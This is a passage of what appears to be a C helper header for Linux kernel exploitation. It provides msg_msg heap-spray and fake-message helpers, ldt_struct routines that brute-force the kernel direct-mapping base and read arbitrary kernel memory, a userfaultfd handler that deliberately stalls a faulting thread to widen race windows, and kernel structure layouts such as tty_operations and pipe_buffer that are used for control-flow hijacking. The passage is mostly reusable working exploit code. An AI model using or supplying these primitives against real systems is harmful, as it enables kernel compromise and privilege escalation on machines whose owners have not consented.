    /* one flat counter walks the pairs in the same order as a nested loop */
    for (int k = 0; k < SOCKET_NUM * SK_BUFF_NUM; k++) {
        int pair = k / SK_BUFF_NUM;

        if (read(sk_socket[pair][1], buf, size) < 0) {
            puts("[x] failed to received sk_buff!");
            return -1;
        }
    }

    return 0;
}

/**
 * VI - msg_msg related
 */

/* fallback for libc headers that do not expose the MSG_COPY msgrcv() flag */
#ifndef MSG_COPY
#define MSG_COPY 040000
#endif

/* message header layout; pointer-sized members are kept as raw 64-bit values */
struct msg_msg {
struct list_head m_list;
uint64_t m_type;
uint64_t m_ts;
uint64_t next;
uint64_t security;
};

/* message segment header: a single link kept as a raw 64-bit value */
struct msg_msgseg {
uint64_t next;
};

/*
 * For reference, the message buffer type that write_msg() casts `msgp` to:
 *
struct msgbuf {
long mtype;
char mtext[0];
};
*/

/**
 * Create a new private message queue with mode 0666.
 *
 * @return the queue id returned by msgget()
 */
int get_msg_queue(void)
{
    const int flags = 0666 | IPC_CREAT;

    return msgget(IPC_PRIVATE, flags);
}

/**
 * Receive (and remove) a message from a queue, with no msgrcv() flags set.
 *
 * @param msqid  queue id
 * @param msgp   destination message buffer
 * @param msgsz  capacity of the text part
 * @param msgtyp message type selector
 * @return result of msgrcv()
 */
ssize_t read_msg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{
    ssize_t received = msgrcv(msqid, msgp, msgsz, msgtyp, 0);

    return received;
}

/**
 * Send a message to a queue.
 *
 * `msgp` should point to a `struct msgbuf`, with the data stored in
 * msgbuf.mtext; its mtype field is overwritten with `msgtyp` before sending.
 *
 * @param msqid  queue id
 * @param msgp   message buffer
 * @param msgsz  size of the text part
 * @param msgtyp message type to stamp into the buffer
 * @return result of msgsnd()
 */
ssize_t write_msg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{
    struct msgbuf *outgoing = (struct msgbuf *) msgp;

    outgoing->mtype = msgtyp;

    return msgsnd(msqid, outgoing, msgsz, 0);
}

/**
 * Copy a message out of a queue without removing it.
 *
 * With MSG_COPY, `msgtyp` selects the no.msgtyp msg_msg on the queue.
 * The call never blocks (IPC_NOWAIT), and MSG_NOERROR is set as well.
 *
 * @param msqid  queue id
 * @param msgp   destination message buffer
 * @param msgsz  capacity of the text part
 * @param msgtyp position of the message on the queue
 * @return result of msgrcv()
 */
ssize_t peek_msg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{
    const int peek_flags = MSG_COPY | IPC_NOWAIT | MSG_NOERROR;

    return msgrcv(msqid, msgp, msgsz, msgtyp, peek_flags);
}

void build_msg(struct msg_msg *msg, uint64_t m_list_next, uint64_t m_list_prev,
uint64_t m_type, uint64_t m_ts, uint64_t next, uint64_t security)
{
msg->m_list.next = m_list_next;
msg->m_list.prev = m_list_prev;
msg->m_type = m_type;
msg->m_ts = m_ts;
msg->next = next;
msg->security = security;
}

/**
 * VII - ldt_struct related
 */

/**
 * Sometimes we may want to compile the exp binary with MUSL-GCC, which
 * doesn't ship the `asm/ldt.h` file.
 * As the file is small, it is copied directly here :)
 */

/* Maximum number of LDT entries supported. */
#define LDT_ENTRIES 8192
/* The size of each LDT entry. */
#define LDT_ENTRY_SIZE 8

#ifndef __ASSEMBLY__
/*
 * Note: on 64-bit, base and limit are ignored and you cannot set DS/ES/CS
 * to non-default values if you still want to do syscalls. This
 * call is therefore more useful in 32-bit mode.
 */
/* descriptor record handed to the modify_ldt syscall */
struct user_desc {
unsigned int entry_number;
unsigned int base_addr;
unsigned int limit;
unsigned int seg_32bit:1;
unsigned int contents:2;
unsigned int read_exec_only:1;
unsigned int limit_in_pages:1;
unsigned int seg_not_present:1;
unsigned int useable:1;
#ifdef __x86_64__
/*
 * Because this bit is not present in 32-bit user code, user
 * programs can pass uninitialized values here. Therefore, in
 * any context in which a user_desc comes from a 32-bit program,
 * the kernel must act as though lm == 0, regardless of the
 * actual value.
 */
unsigned int lm:1;
#endif
};

/* values for user_desc.contents */
#define MODIFY_LDT_CONTENTS_DATA 0
#define MODIFY_LDT_CONTENTS_STACK 1
#define MODIFY_LDT_CONTENTS_CODE 2

#endif /* !__ASSEMBLY__ */

/* kernel-specific address: adjust this value to match the target kernel */
#define SECONDARY_STARTUP_64 0xffffffff81000060

/**
 * Descriptor initializer: fills a user_desc with the fixed values used by
 * the LDT helpers in this file.
 *
 * @param desc descriptor to initialise; every field is overwritten
 */
static inline void init_desc(struct user_desc *desc)
{
    /* slot and address fields */
    desc->entry_number = 0x8000 / 8;
    desc->base_addr = 0xff0000;
    desc->limit = 0;

    /* every flag bit is cleared */
    desc->seg_32bit = 0;
    desc->contents = 0;
    desc->read_exec_only = 0;
    desc->limit_in_pages = 0;
    desc->seg_not_present = 0;
    desc->useable = 0;
    desc->lm = 0;
}

/**
 * @brief brute-force page_offset_base by modifying ldt_struct
 *
 * Starting at 0xffff888000000000, the candidate address is handed to
 * ldt_momdifier() and probed with an 8-byte modify_ldt read. The candidate
 * advances by burte_size until a probe returns a positive value.
 *
 * @param ldt_cracker function to make the ldt_struct modifiable
 * @param cracker_args args of ldt_cracker
 * @param ldt_momdifier function to modify the ldt_struct->entries
 * @param momdifier_args args of ldt_momdifier
 * @param burte_size step between two consecutive candidates
 * @return size_t address of page_offset_base, or -1 when a probe returns 0
 */
size_t ldt_guessing_direct_mapping_area(void *(*ldt_cracker)(void*),
                                        void *cracker_args,
                                        void *(*ldt_momdifier)(void*, size_t),
                                        void *momdifier_args,
                                        uint64_t burte_size)
{
    struct user_desc desc;
    uint64_t candidate = 0xffff888000000000;
    uint64_t probe;
    int rc;

    /* init descriptor info */
    init_desc(&desc);

    /* make the ldt_struct modifiable, then install one entry */
    ldt_cracker(cracker_args);
    syscall(SYS_modify_ldt, 1, &desc, sizeof(desc));

    /* leak kernel direct mapping area by modify_ldt() */
    for (;; candidate += burte_size) {
        ldt_momdifier(momdifier_args, candidate);

        rc = syscall(SYS_modify_ldt, 0, &probe, 8);
        if (rc > 0) {
            return candidate;
        }

        if (rc == 0) {
            printf("[x] no mm->context.ldt!");
            return (size_t) -1;
        }
    }
}

/**
 * @brief read 0x8000 bytes from a specific kernel memory address.
 * Note that ldt_guessing_direct_mapping_area() should be called first,
 * and this function should be used in that same caller process.
 *
 * The modify_ldt read is done in a forked child, which sends the data back
 * through a pipe. The parent closes its copy of the write end before
 * reading, so a child that dies without writing yields EOF instead of
 * blocking the parent forever. The parent then reaps exactly that child.
 *
 * On any failure (pipe, fork, short or missing data) a message is printed
 * where applicable and res_buf keeps whatever was received so far.
 *
 * @param ldt_momdifier function to modify the ldt_struct->entries
 * @param momdifier_args args of ldt_momdifier
 * @param addr address of kernel memory to read
 * @param res_buf buffer of at least 0x8000 bytes receiving the data
 */
void ldt_arbitrary_read(void *(*ldt_momdifier)(void*, size_t),
                        void *momdifier_args, size_t addr, char *res_buf)
{
    static char buf[0x8000];
    int pipe_fd[2];
    pid_t child;
    size_t got = 0;

    /* modify the ldt_struct->entries to addr */
    ldt_momdifier(momdifier_args, addr);

    if (pipe(pipe_fd) < 0) {
        printf("[x] failed at pipe() for ldt reading\n");
        return;
    }

    /* read data by the child process */
    child = fork();
    if (child < 0) {
        printf("[x] failed at fork() for ldt reading\n");
        close(pipe_fd[0]);
        close(pipe_fd[1]);
        return;
    }

    if (child == 0) {
        /* child */
        close(pipe_fd[0]);
        syscall(SYS_modify_ldt, 0, buf, 0x8000);
        write(pipe_fd[1], buf, 0x8000);
        /* _exit: do not flush stdio buffers inherited from the parent */
        _exit(0);
    }

    /* parent: drop the write end so EOF is seen if the child dies early */
    close(pipe_fd[1]);

    while (got < 0x8000) {
        ssize_t n = read(pipe_fd[0], res_buf + got, 0x8000 - got);

        if (n <= 0) {
            break;
        }
        got += (size_t) n;
    }

    close(pipe_fd[0]);
    waitpid(child, NULL, 0);
}

/**
 * @brief seek specific content in the memory.
 * Note that ldt_guessing_direct_mapping_area() should be called first,
 * and this function should be used in that same caller process.
 *
 * Memory is scanned in 0x8000-byte windows starting at page_offset_base;
 * the scan only stops once mem_finder reports a hit.
 *
 * @param ldt_momdifier function to modify the ldt_struct->entries
 * @param momdifier_args args of ldt_momdifier
 * @param page_offset_base the page_offset_base we leaked before
 * @param mem_finder your own function to search a 0x8000-byte buf.
 * It should look like `size_t func(void *args, char *buf)`, where `buf`
 * holds the data read from the kernel by ldt_seeking_memory().
 * Its return value should be the offset inside `buf`, `-1` for failure
 * @param finder_args your own function's args
 * @return size_t kernel addr of the content found
 */
size_t ldt_seeking_memory(void *(*ldt_momdifier)(void*, size_t),
                          void *momdifier_args, uint64_t page_offset_base,
                          size_t (*mem_finder)(void*, char *), void *finder_args)
{
    static char buf[0x8000];
    size_t window;

    for (window = page_offset_base; ; window += 0x8000) {
        size_t hit;

        ldt_arbitrary_read(ldt_momdifier, momdifier_args, window, buf);

        hit = mem_finder(finder_args, buf);
        if (hit != (size_t) -1) {
            return window + hit;
        }
    }
}

/**
 * VIII - userfaultfd related code
 */

/**
 * MUSL also doesn't ship `userfaultfd.h` :(
 * Luckily we only need a few macros for exploitation,
 * so defining them directly is fine :)
 */

/* API version value placed in uffdio_api.api */
#define UFFD_API ((uint64_t)0xAA)
/* ioctl command numbers */
#define _UFFDIO_REGISTER (0x00)
#define _UFFDIO_COPY (0x03)
#define _UFFDIO_API (0x3F)

/* userfaultfd ioctl ids */
#define UFFDIO 0xAA
#define UFFDIO_API _IOWR(UFFDIO, _UFFDIO_API, \
struct uffdio_api)
#define UFFDIO_REGISTER _IOWR(UFFDIO, _UFFDIO_REGISTER, \
struct uffdio_register)
#define UFFDIO_COPY _IOWR(UFFDIO, _UFFDIO_COPY, \
struct uffdio_copy)

/* read() structure: one event record read from the userfaultfd */
struct uffd_msg {
/* event type, e.g. UFFD_EVENT_PAGEFAULT */
uint8_t event;

uint8_t reserved1;
uint16_t reserved2;
uint32_t reserved3;

/* event-specific payload */
union {
struct {
uint64_t flags;
/* faulting address; the handler rounds it down to a page boundary */
uint64_t address;
union {
uint32_t ptid;
} feat;
} pagefault;

struct {
uint32_t ufd;
} fork;

struct {
uint64_t from;
uint64_t to;
uint64_t len;
} remap;

struct {
uint64_t start;
uint64_t end;
} remove;

struct {
/* unused reserved fields */
uint64_t reserved1;
uint64_t reserved2;
uint64_t reserved3;
} reserved;
} arg;
} __attribute__((packed));

/* value of uffd_msg.event for a page fault */
#define UFFD_EVENT_PAGEFAULT 0x12

/* argument of the UFFDIO_API ioctl */
struct uffdio_api {
/* set to UFFD_API by register_userfaultfd() */
uint64_t api;
/* set to 0 by register_userfaultfd() */
uint64_t features;
uint64_t ioctls;
};

/* address range: start address and length in bytes */
struct uffdio_range {
uint64_t start;
uint64_t len;
};

/* argument of the UFFDIO_REGISTER ioctl */
struct uffdio_register {
/* range to be monitored */
struct uffdio_range range;
/* flag bits for `mode` */
#define UFFDIO_REGISTER_MODE_MISSING ((uint64_t)1<<0)
#define UFFDIO_REGISTER_MODE_WP ((uint64_t)1<<1)
uint64_t mode;
uint64_t ioctls;
};


/* argument of the UFFDIO_COPY ioctl */
struct uffdio_copy {
/* destination address (page-aligned by the handler in this file) */
uint64_t dst;
/* source address of the data to copy in */
uint64_t src;
/* number of bytes to copy */
uint64_t len;
/* flag bit for `mode` */
#define UFFDIO_COPY_MODE_DONTWAKE ((uint64_t)1<<0)
uint64_t mode;
int64_t copy;
};

/* the definitions above stand in for <linux/userfaultfd.h> */

/* source page handed to UFFDIO_COPY by uffd_handler_for_stucking_thread() */
char temp_page_for_stuck[0x1000];

void register_userfaultfd(pthread_t *monitor_thread, void *addr,
unsigned long len, void *(*handler)(void*))
{
long uffd;
struct uffdio_api uffdio_api;
struct uffdio_register uffdio_register;
int s;

/* Create and enable userfaultfd object */
uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
if (uffd == -1) {
err_exit("userfaultfd");
}

uffdio_api.api = UFFD_API;
uffdio_api.features = 0;
if (ioctl(uffd, UFFDIO_API, &uffdio_api) == -1) {
err_exit("ioctl-UFFDIO_API");
}

uffdio_register.range.start = (unsigned long) addr;
uffdio_register.range.len = len;
uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING;
if (ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) == -1) {
err_exit("ioctl-UFFDIO_REGISTER");
}

s = pthread_create(monitor_thread, NULL, handler, (void *) uffd);
if (s != 0) {
err_exit("pthread_create");
}
}

/**
 * Monitor-thread routine that parks on the first userfaultfd event.
 *
 * @param args the userfaultfd descriptor, passed as a pointer-sized integer
 * @return NULL (only reached after the long sleep below has elapsed)
 *
 * The thread polls the descriptor, reads one event and then sleeps for a
 * very long time. The UFFDIO_COPY that resolves the fault comes after the
 * sleep, so the fault is left unresolved for that whole period.
 * The checks and the copy that follow run only once the sleep returns,
 * and the function returns at the end of the first loop iteration.
 */
void *uffd_handler_for_stucking_thread(void *args)
{
struct uffd_msg msg;
/* not used in this function */
int fault_cnt = 0;
long uffd;

struct uffdio_copy uffdio_copy;
ssize_t nread;

uffd = (long) args;

for (;;) {
struct pollfd pollfd;
int nready;
pollfd.fd = uffd;
pollfd.events = POLLIN;
/* block until an event is available */
nready = poll(&pollfd, 1, -1);

if (nready == -1) {
err_exit("poll");
}

nread = read(uffd, &msg, sizeof(msg));

/* park here on purpose; the fault stays pending while we sleep */
sleep(100000000);

if (nread == 0) {
err_exit("EOF on userfaultfd!\n");
}

if (nread == -1) {
err_exit("read");
}

if (msg.event != UFFD_EVENT_PAGEFAULT) {
err_exit("Unexpected event on userfaultfd\n");
}

/* resolve the fault with temp_page_for_stuck at the page-aligned address */
uffdio_copy.src = (unsigned long long) temp_page_for_stuck;
uffdio_copy.dst = (unsigned long long) msg.arg.pagefault.address &
~(0x1000 - 1);
uffdio_copy.len = 0x1000;
uffdio_copy.mode = 0;
uffdio_copy.copy = 0;
if (ioctl(uffd, UFFDIO_COPY, &uffdio_copy) == -1) {
err_exit("ioctl-UFFDIO_COPY");
}

return NULL;
}
}

/**
 * Register `buf` with userfaultfd, using the parking handler
 * uffd_handler_for_stucking_thread() as the monitor routine.
 *
 * @param monitor_thread receives the id of the monitor thread
 * @param buf            start of the region to monitor
 * @param len            length of the region in bytes
 */
void register_userfaultfd_for_thread_stucking(pthread_t *monitor_thread,
                                              void *buf, unsigned long len)
{
    void *(*parking_handler)(void *) = uffd_handler_for_stucking_thread;

    register_userfaultfd(monitor_thread, buf, len, parking_handler);
}


/**
 * IX - kernel structures
 */

/* opaque types that the structures below only reference through pointers */
struct file;
struct file_operations;
struct tty_struct;
struct tty_driver;
struct serial_icounter_struct;
struct ktermios;
struct termiox;
struct seq_operations;

/*
 * Layout of seq_file.
 * NOTE(review): presumably has to match the target kernel's definition -
 * verify field order and sizes against that kernel.
 */
struct seq_file {
char *buf;
size_t size;
size_t from;
size_t count;
size_t pad_until;
loff_t index;
loff_t read_pos;
/* stand-in for the embedded mutex: four 64-bit words */
uint64_t lock[4]; //struct mutex lock;
const struct seq_operations *op;
int poll_event;
const struct file *file;
void *private;
};

/* function-pointer table referenced by seq_file.op */
struct seq_operations {
void * (*start) (struct seq_file *m, loff_t *pos);
void (*stop) (struct seq_file *m, void *v);
void * (*next) (struct seq_file *m, void *v, loff_t *pos);
int (*show) (struct seq_file *m, void *v);
};

/*
 * Function-pointer table for tty operations.
 * NOTE(review): presumably has to match the target kernel's definition -
 * the member list differs between kernel versions, verify before relying
 * on offsets.
 */
struct tty_operations {
struct tty_struct * (*lookup)(struct tty_driver *driver,
struct file *filp, int idx);
int (*install)(struct tty_driver *driver, struct tty_struct *tty);
void (*remove)(struct tty_driver *driver, struct tty_struct *tty);
int (*open)(struct tty_struct * tty, struct file * filp);
void (*close)(struct tty_struct * tty, struct file * filp);
void (*shutdown)(struct tty_struct *tty);
void (*cleanup)(struct tty_struct *tty);
int (*write)(struct tty_struct * tty,
const unsigned char *buf, int count);
int (*put_char)(struct tty_struct *tty, unsigned char ch);
void (*flush_chars)(struct tty_struct *tty);
int (*write_room)(struct tty_struct *tty);
int (*chars_in_buffer)(struct tty_struct *tty);
int (*ioctl)(struct tty_struct *tty,
unsigned int cmd, unsigned long arg);
long (*compat_ioctl)(struct tty_struct *tty,
unsigned int cmd, unsigned long arg);
void (*set_termios)(struct tty_struct *tty, struct ktermios * old);
void (*throttle)(struct tty_struct * tty);
void (*unthrottle)(struct tty_struct * tty);
void (*stop)(struct tty_struct *tty);
void (*start)(struct tty_struct *tty);
void (*hangup)(struct tty_struct *tty);
int (*break_ctl)(struct tty_struct *tty, int state);
void (*flush_buffer)(struct tty_struct *tty);
void (*set_ldisc)(struct tty_struct *tty);
void (*wait_until_sent)(struct tty_struct *tty, int timeout);
void (*send_xchar)(struct tty_struct *tty, char ch);
int (*tiocmget)(struct tty_struct *tty);
int (*tiocmset)(struct tty_struct *tty,
unsigned int set, unsigned int clear);
int (*resize)(struct tty_struct *tty, struct winsize *ws);
int (*set_termiox)(struct tty_struct *tty, struct termiox *tnew);
int (*get_icount)(struct tty_struct *tty,
struct serial_icounter_struct *icount);
void (*show_fdinfo)(struct tty_struct *tty, struct seq_file *m);
/* these three members exist only when CONFIG_CONSOLE_POLL is defined */
#ifdef CONFIG_CONSOLE_POLL
int (*poll_init)(struct tty_driver *driver, int line, char *options);
int (*poll_get_char)(struct tty_driver *driver, int line);
void (*poll_put_char)(struct tty_driver *driver, int line, char ch);
#endif
const struct file_operations *proc_fops;
};

/* opaque types that the pipe structures below only reference through pointers */
struct page;
struct pipe_inode_info;
struct pipe_buf_operations;

/*
 * Layout of pipe_buffer.
 * read start from len to offset, write start from offset
 * NOTE(review): the sentence above is kept from the original and is
 * ambiguous - confirm the intended meaning of offset/len.
 */
struct pipe_buffer {
struct page *page;
unsigned int offset, len;
const struct pipe_buf_operations *ops;
unsigned int flags;
unsigned long private;
};

/* function-pointer table referenced by pipe_buffer.ops */
struct pipe_buf_operations {
/*
 * ->confirm() verifies that the data in the pipe buffer is there
 * and that the contents are good. If the pages in the pipe belong
 * to a file system, we may need to wait for IO completion in this
 * hook. Returns 0 for good, or a negative error value in case of
 * error. If not present all pages are considered good.
 */
int (*confirm)(struct pipe_inode_info *, struct pipe_buffer *);

/*
 * When the contents of this pipe buffer have been completely
 * consumed by a reader, ->release() is called.
 */
void (*release)(struct pipe_inode_info *, struct pipe_buffer *);

/*
 * Attempt to take ownership of the pipe buffer and its contents.
 * ->try_steal() returns %true for success, in which case the contents
 * of the pipe (the buf->page) is locked and now completely owned by the
 * caller. The page may then be transferred to a different mapping, the
 * most often used case is insertion into different file address space
 * cache.
 */
int (*try_steal)(struct pipe_inode_info *, struct pipe_buffer *);

/*
 * Get a reference to the pipe buffer.
 */
int (*get)(struct pipe_inode_info *, struct pipe_buffer *);
};

#endif